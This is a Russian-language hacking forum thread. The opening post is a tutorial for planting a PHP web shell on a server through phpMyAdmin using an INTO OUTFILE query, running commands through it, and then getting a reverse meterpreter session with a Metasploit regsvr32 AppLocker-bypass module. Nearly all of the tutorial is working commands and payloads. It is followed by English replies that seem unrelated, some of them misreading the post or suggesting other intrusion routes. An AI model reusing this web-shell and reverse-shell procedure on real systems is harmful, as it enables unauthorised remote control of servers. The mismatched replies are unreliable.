Загрузка shell в WEB-сервер. PhpMyAdmin

Gidroponika

Exploit Developer
Joined
Aug 17, 2016
Messages
1,784
Reaction score
826
Приветствую! В этой статье рассмотрим способ загрузки shell на целевой веб-сервер, при условии, что у нас есть доступ к phpmyadmin панели. В качестве платформы для тестов, возьмем XAMPP, о нем я уже писал в этой статье.
Для начала необходимо будет сгенерировать SQL запрос для выполнения вредоносного кода, а затем приложить некоторые усилия, чтобы получить полноценный доступ к удаленному хосту.
24191358b05c904442320.png

Итак, работать для начала, будем с PhpMyAdmin – это веб-приложение с открытым кодом, написанное на языке PHP и представляющее собой веб-интерфейс для администрирования СУБД MySQL. PHPMyAdmin позволяет через браузер осуществлять администрирование сервера MySQL, запускать команды SQL и просматривать содержимое таблиц и баз данных. Подробнее здесь:
> https://www.phpmyadmin.net

Заходим в панель управления phpmyadmin и создаем новую базу данных:
2f1ebf809e4d30398bdbe.png

Затем, выбрав эту базу данных, идем в поле SQL, вписываем туда представленный ниже SQL запрос и выполняем его.
> SELECT “<?php system($_GET[‘cmd’]); ?>” into outfile “C:\\xampp\\htdocs\\backdoor.php”
4c6cd1a9af4044cf44684.png

Теперь, попробуем обратиться к серверу по адресу 127.0.0.1/backdoor.php, если вы видите такой вывод, то уязвимость успешно создана:
12ec0546d9aa8a4c709b0.png

Так же, это значит, что через строку браузера, мы можем передавать команды в cmd скомпрометированного хоста.
> 127.0.0.1/backdoor.php?cmd=systeminfo
525d41383462a6c12e646.png

Осталось получить активную сессию meterpreter на своем хосте, для полного контроля над целевым.
Запускаем Msfconsole и используем следующий эксплоит:
> use exploit/windows/misc/regsvr32_applocker_bypass_server
> set lhost 172.16.0.192
> set lport 4444
> exploit

488a227767b5590b66f21.png

Выделенный текст, следует вписать как команду в адресную строку браузера, после cmd=
> 127.0.0.1/backdoor.php?cmd=выделенный текст
5f60d748c58dff216e480.png

Как результат, получаем активную сессию meterpreter:
ab8ac1d271264c04bb8f0.png
 

Irina78

Member
Joined
Feb 13, 2009
Messages
5
Reaction score
0
"Yo, I think you're referring to uploading a shell to a web server via PhpMyAdmin? I'd advise against it, as it's super insecure and can lead to a full-on compromise. Why not use a more robust method, like exploiting a vulnerability in a plugin or a CMS?"
 

ann

New member
Joined
Apr 11, 2006
Messages
1
Reaction score
0
"Hey guys, I think the issue is with the file permissions on the server. Make sure the www-data user has write access to the /var/www/ folder, then try ftp-ing the shell script again."
 

Developer06

New member
Joined
Mar 2, 2010
Messages
2
Reaction score
0
"Hey guys, I'm assuming you're trying to upload a shell or something to your web server through PHPMyAdmin? Be careful, 'cause that's a huge security risk if you get caught. Has anyone figured out how to do this securely?"
 

QDiesel

Member
Joined
Feb 23, 2006
Messages
5
Reaction score
0
I'm not fluent in Russian, but I'll give it a shot. Are you trying to set up a web server with PHP and SSH access? You might want to check out some tutorials on setting up a LAMP stack (Linux, Apache, MySQL, PHP) - that should cover what you're looking for.
 
Top